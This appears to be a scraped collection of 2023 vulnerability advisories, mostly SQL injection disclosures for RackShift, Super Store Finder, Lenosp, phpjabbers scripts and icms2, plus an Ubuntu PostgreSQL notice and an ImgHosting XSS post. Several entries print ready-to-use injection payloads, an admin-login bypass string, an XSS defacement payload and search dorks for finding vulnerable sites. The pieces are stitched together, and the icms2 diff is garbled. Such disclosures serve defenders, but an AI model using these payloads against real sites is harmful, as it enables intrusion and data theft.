SQL injection vulnerability in FIT2CLOUD RackShift v1.7.1 allows attackers to execute arbitrary code via the `sort` parameter to taskService.list(), bareMetalService.list(), and switchService.list().

**Description**

Multiple SQL injection vulnerabilities in RackShift v1.7.1 allow attacker to execute arbitrary SQL commands via the sort parameter to taskService.list(), bareMetalService.list(), switchService.list() and so on.

**Detail**

Multiple controllers have SQL injection vulnerabilities, and I will use TaskController as an example to provide a detailed explanation. The list() method in TaskController.java accepts user-supplied POST request body parameters, which are then passed to taskService.list() for processing.  
  
The TaskDTO definition includes a "sort" parameter.  
  
Upon further investigation in TaskService.java, it was found that the parameters are ultimately handled by extTaskMapper.list() in ExtTaskMapper.java.  
  
  
Upon further inspection of ExtTaskMapper.xml, it was discovered that when the "sort" parameter is not empty, it is directly concatenated into the SQL query as "order by ${sort}", without any validation or sanitization. This results in a SQL injection vulnerability.  

**Payload**

    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: {"searchKey":"1","sort":"(UPDATEXML(2546,CONCAT(0x2e,0x717a6b7171,(SELECT (ELT(2546=2546,1))),0x7171787871),9622))"}
    
    Type: time-based blind
    Title: MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment)
    Payload: {"searchKey":"1","sort":"(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)"}
    

**PoC**

**Suggestion**

Define a whitelist of "sort" parameter values and validate incoming "sort" parameters against the whitelist at the Java code.

CVE-2023-42405: [BUG] SQL injection vulnerability in list() method across multiple controllers · Issue #79 · fit2cloud/rackshift

SQL injection vulnerability in Super Store Finder PHP Script v.3.6 allows a remote attacker to execute arbitrary code via a crafted payload to the username parameter.

    #Title : Super Store Finder PHP Script SQL Injection / Bypass admin login#Researcher : Etharus#Vendor : Joe Iz, https://superstorefinder.net/#Script Demo Url : https://superstorefinder.net/products/superstorefinder/#Version Affected : 3.6 and below#Date : 5 July 2023#FOFA Dork : "designed and built by Joe Iz."# Step 1 : Go to admin login, eg: http://localhost/store-finder/admin/# Step 2 : Enter following payloadusername : ' union select 1,'admin','32ddaaea6874e2d3eab0a9ea6ecbb0d0',4,5,6,7,8,9,10,11-- -password : admin

CVE-2023-38912: Super Store Finder PHP Script 3.6 SQL Injection ≈ Packet Storm

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Movus allows SQL Injection.This issue affects Movus: before 20230913.



CVE-2023-4766

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Aceka Company Management allows SQL Injection.This issue affects Company Management: before 3072 .



CVE-2023-4832

Lenosp 1.0.0-1.2.0 is vulnerable to SQL Injection via the log query module.

Logined -> System Monitor -> System Logs -> Enter username and type -> Query  

Obtain the data packet for the query

Run sqlmap

URI parameter 'userName' is injectable

Affected version: 1.0-1.2.0

CVE-2023-42178: SQL Injection in log query module · Issue #I7X5QL · 郑州程序员/lenosp - Gitee.com

Ubuntu Security Notice 6366-1 - It was discovered that PostgreSQL incorrectly handled certain extension script substitutions. An attacker having database-level CREATE privileges can use this issue to execute arbitrary code as the bootstrap superuser.

==========================================================================  
Ubuntu Security Notice USN-6366-1  
September 13, 2023

postgresql-9.5 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

PostgreSQL could be made to execute commands as the bootstrap superuser.

Software Description:  
- postgresql-9.5: Object-relational SQL database

Details:

It was discovered that PostgreSQL incorrectly handled certain extension  
script substitutions. An attacker having database-level CREATE privileges  
can use this issue to execute arbitrary code as the bootstrap superuser.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   postgresql-9.5                     9.5.25-0ubuntu0.16.04.1+esm5  
   postgresql-client-9.5           9.5.25-0ubuntu0.16.04.1+esm5

After a standard system update you need to restart PostgreSQL to make  
all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6366-1  
   CVE-2023-39417

Ubuntu Security Notice USN-6366-1

ImgHosting version 1.3 suffers from a cross site scripting vulnerability.

**ImgHosting 1.3 Cross Site Scripting**

Posted Sep 14, 2023

Authored by indoushka

ImgHosting version 1.3 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 8c169afaf39b32fa5c563194367feecff6f19735b337600d64caa7b0f3c6b6a3

Download | Favorite | View

**ImgHosting 1.3 Cross Site Scripting**

    ====================================================================================================================================| # Title     : ImgHosting v1.3 XSS Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://codecanyon.net/user/FoxSash/?ref=FoxSash                                                                   |  | # Dork      : "ImgHosting  Programming by FoxSash"                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : ?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://www.127.0.0.1/pikhostingcom/?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,202)
*   Arbitrary (16,255)
*   BBS (2,859)
*   Bypass (1,744)
*   CGI (1,027)
*   Code Execution (7,302)
*   Conference (680)
*   Cracker (842)
*   CSRF (3,348)
*   DoS (23,535)
*   Encryption (2,371)
*   Exploit (52,098)
*   File Inclusion (4,228)
*   File Upload (977)
*   Firewall (821)
*   Info Disclosure (2,792)
*   Intrusion Detection (894)
*   Java (3,049)
*   JavaScript (860)
*   Kernel (6,732)
*   Local (14,499)
*   Magazine (586)
*   Overflow (12,707)
*   Perl (1,423)
*   PHP (5,153)
*   Proof of Concept (2,343)
*   Protocol (3,606)
*   Python (1,536)
*   Remote (30,859)
*   Root (3,591)
*   Rootkit (509)
*   Ruby (612)
*   Scanner (1,641)
*   Security Tool (7,897)
*   Shell (3,195)
*   Shellcode (1,216)
*   Sniffer (895)
*   Spoof (2,209)
*   SQL Injection (16,411)
*   TCP (2,407)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,829)
*   Web (9,695)
*   Whitepaper (3,751)
*   x86 (962)
*   XSS (17,999)
*   Other

**File Archives**

*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,005)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,835)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,323)
*   HPUX (879)
*   iOS (352)
*   iPhone (108)
*   IRIX (220)
*   Juniper (68)
*   Linux (46,701)
*   Mac OS X (687)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,853)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,907)
*   UNIX (9,308)
*   UnixWare (186)
*   Windows (6,585)
*   Other

ImgHosting 1.3 Cross Site Scripting

PHP Shopping Cart version 4.2 suffers from a remote SQL injection vulnerability.

    ## Title: PHP Shopping Cart-4.2 Multiple-SQLi## Author: nu11secur1ty## Date: 09/13/2023## Vendor: https://www.phpjabbers.com/## Software:https://www.phpjabbers.com/php-shopping-cart-script/#sectionPricing## Reference: https://portswigger.net/web-security/sql-injection## Description:The `id` parameter appears to be vulnerable to SQL injection attacks.A single quote was submitted in the id parameter, and a database errormessage was returned. Two single quotes were then submitted and theerror message disappeared. The attacker easily can steal allinformation from the database of this web application!WARNING! All of you: Be careful what you buy! This will be your responsibility!STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: id (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: controller=pjFront&action=pjActionGetStocks&id=1') OR NOT3795=3795-- sRcp&session_id=    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (GTID_SUBSET)    Payload: controller=pjFront&action=pjActionGetStocks&id=1') ANDGTID_SUBSET(CONCAT(0x71717a6b71,(SELECT(ELT(3820=3820,1))),0x7178627871),3820)-- kQZA&session_id=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND(SELECT 2625 FROM (SELECT(SLEEP(5)))nVyA)-- FGLs&session_id=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Shopping-Cart-4.2)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/php-shopping-cart-42-multiple-sqli.html)## Time spent:00:37:00

PHP Shopping Cart 4.2 SQL Injection

Fundraising Script version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: Fundraising Script-1.0 SQLi## Author: nu11secur1ty## Date: 09/13/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/fundraising-script/#sectionDemo## Reference: https://portswigger.net/web-security/sql-injection## Description:The `cid` parameter appears to be vulnerable to SQL injection attacks.The payload ' was submitted in the cid parameter, and a database errormessage was returned.The database is empty, but if it is not, this will be over for themoney of the donors and their bank accounts!The attacker can steal all information from the database!STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: cid (GET)    Type: error-based    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)    Payload: controller=pjFront&action=pjActionLoadCampaign&cid=(UPDATEXML(1741,CONCAT(0x2e,0x71626b7071,(SELECT(ELT(1741=1741,1))),0x7162787171),3873))---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Fundraising-Script-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/fundraising-script-10-sqli.html)## Time spent:01:15:00

Fundraising Script 1.0 SQL Injection

 SQL Injection in GitHub repository instantsoft/icms2 prior to 2.16.1.

Expand Up @@ -2,51 +2,50 @@  
class actionModerationLogs extends cmsAction {  
public function run($target\_controller = null, $target\_subject = null, $target\_id = null, $moderator\_id = null){ public function run($target\_controller = null, $target\_subject = null, $target\_id = null, $moderator\_id = null) {  
cmsCore::loadAllControllersLanguages();  
$grid = $this\->loadDataGrid('logs');  
$url = href\_to($this\->root\_url, 'logs'); $sub\_url \= array(); $url\_query \= array(); $additional\_h1 \= array(); $url \= href\_to($this\->root\_url, 'logs'); $sub\_url \= \[\]; $url\_query \= \[\]; $additional\_h1 \= \[\]; $subj\_controller = null;  
$action = $this\->request\->get('action', -1); $action \= $this\->request\->get('action', -1); $only\_to\_delete = $this\->request\->get('only\_to\_delete', 0); if($action > -1){  
if ($action > -1) {  
$this\->model\->filterEqual('action', $action);  
if($only\_to\_delete){ if ($only\_to\_delete) {  
$this\->model\->filterNotNull('date\_expired');  
$url\_query\['only\_to\_delete'\] = $only\_to\_delete;  
}  
$additional\_h1\[\] = string\_lang('LANG\_MODERATION\_ACTION\_'.$action); $additional\_h1\[\] = string\_lang('LANG\_MODERATION\_ACTION\_' . $action);  
$url\_query\['action'\] = $action;  
}  
if(!empty($target\_controller)){ if (!empty($target\_controller)) {  
$subj\_controller = cmsCore::getController($target\_controller);  
$this\->model\->filterEqual('target\_controller', $target\_controller);  
$sub\_url\[\] = $target\_controller;  
if(!empty($target\_subject)){ if (!empty($target\_subject)) {  
$ctype = $subj\_controller\->getContentTypeForModeration($target\_subject);  
if($ctype){ if ($ctype) { $target\_subject = $ctype\['name'\]; } else { return cmsCore::error404(); Expand All @@ -56,45 +55,42 @@ public function run($target\_controller = null, $target\_subject = null, $target\_i  
$sub\_url\[\] = $target\_subject;  
if($ctype){ if ($ctype) { $additional\_h1\[\] = $ctype\['title'\]; }  
if(!empty($target\_id)){ if (!empty($target\_id)) {  
$this\->model\->filterEqual('target\_id', $target\_id);  
$sub\_url\[\] = $target\_id;  
$this\->model\->lockFilters();  
$item = $this\->model\->getItem('moderators\_logs', function ($item, $model){ $item\['data'\] = cmsModel::yamlToArray($item\['data'\]); return $item; }); $item = $this\->model\->getItem('moderators\_logs', function ($item, $model) { $item\['data'\] = cmsModel::yamlToArray($item\['data'\]); return $item; });  
if($item){ $additional\_h1\[\] = $item\['data'\]\['title'\]; } if ($item) { $additional\_h1\[\] = $item\['data'\]\['title'\]; }  
$this\->model\->unlockFilters();  
}  
}  
}  
if(!empty($moderator\_id)){ if (!empty($moderator\_id)) {  
$this\->model\->filterEqual('moderator\_id', $moderator\_id);  
if(count($sub\_url) == 3){ if (count($sub\_url) == 3) { $sub\_url\[\] = $moderator\_id; } elseif(count($sub\_url) == 2){ } elseif (count($sub\_url) == 2) { $sub\_url\[\] = 0; $sub\_url\[\] = $moderator\_id; } elseif(count($sub\_url) == 1){ } elseif (count($sub\_url) == 1) { $sub\_url\[\] = 0; $sub\_url\[\] = 0; $sub\_url\[\] = $moderator\_id; Expand All @@ -107,67 +103,57 @@ public function run($target\_controller = null, $target\_subject = null, $target\_i  
$user = cmsCore::getModel('users')->getuser($moderator\_id);  
if($user){ if ($user) { $additional\_h1\[\] = $user\['nickname'\]; }  
}  
if ($this\->request\->isAjax()) {  
$filter = array(); $filter = \[\]; $filter\_str = $this\->request\->get('filter', '');  
if ($filter\_str){ if ($filter\_str) { parse\_str($filter\_str, $filter); $this\->model\->applyGridFilter($grid, $filter); $grid\->applyGridFilter($this\->model, $filter, 'moderators\_logs'); }  
$total = $this\->model\->getCount('moderators\_logs'); $perpage = isset($filter\['perpage'\]) ? $filter\['perpage'\] : admin::perpage; $pages = ceil($total / $perpage);  
$this\->model\->joinUserLeft('moderator\_id');  
$data = $this\->model\->get('moderators\_logs', function ($item, $model) use($subj\_controller){ $data = $this\->model\->get('moderators\_logs', function ($item, $model) use ($subj\_controller) {  
$item\['data'\] = cmsModel::yamlToArray($item\['data'\]);  
$item\['controller\_title'\] = string\_lang($item\['target\_controller'\].'\_CONTROLLER'); $item\['controller\_title'\] = string\_lang($item\['target\_controller'\] . '\_CONTROLLER');  
$item\['subject\_title'\] = $item\['controller\_title'\];  
if($subj\_controller !== null){ if ($subj\_controller !== null) {  
$ctype = $subj\_controller\->getContentTypeForModeration($item\['target\_subject'\]);  
$item\['subject\_title'\] = $ctype\['title'\];  
}  
return $item; }) ?: \[\];  
});  
$this\->cms\_template\->renderGridRowsJSON($grid, $data, $total, $pages);  
$this\->halt();  
return $this\->cms\_template\->renderJSON($grid\->makeGridRows($data, $total)); }  
if($additional\_h1){ if ($additional\_h1) { $this\->cms\_template\->setPageH1($additional\_h1); }  
$this\->model\->resetFilters();  
return $this\->cms\_template\->render('backend/logs', array( return $this\->cms\_template\->render('backend/logs', \[ 'grid' => $grid, 'sub\_url' => $sub\_url, 'url\_query' => $url\_query, 'url' => $url.($sub\_url ? '/'.implode('/', $sub\_url) : '').(($action > -1) ? '?'.http\_build\_query($url\_query) : '') ));  
'url' => $url . ($sub\_url ? '/' . implode('/', $sub\_url) : '') . (($action > -1) ? '?' . http\_build\_query($url\_query) : '') \]); }  
}

Tag

#sql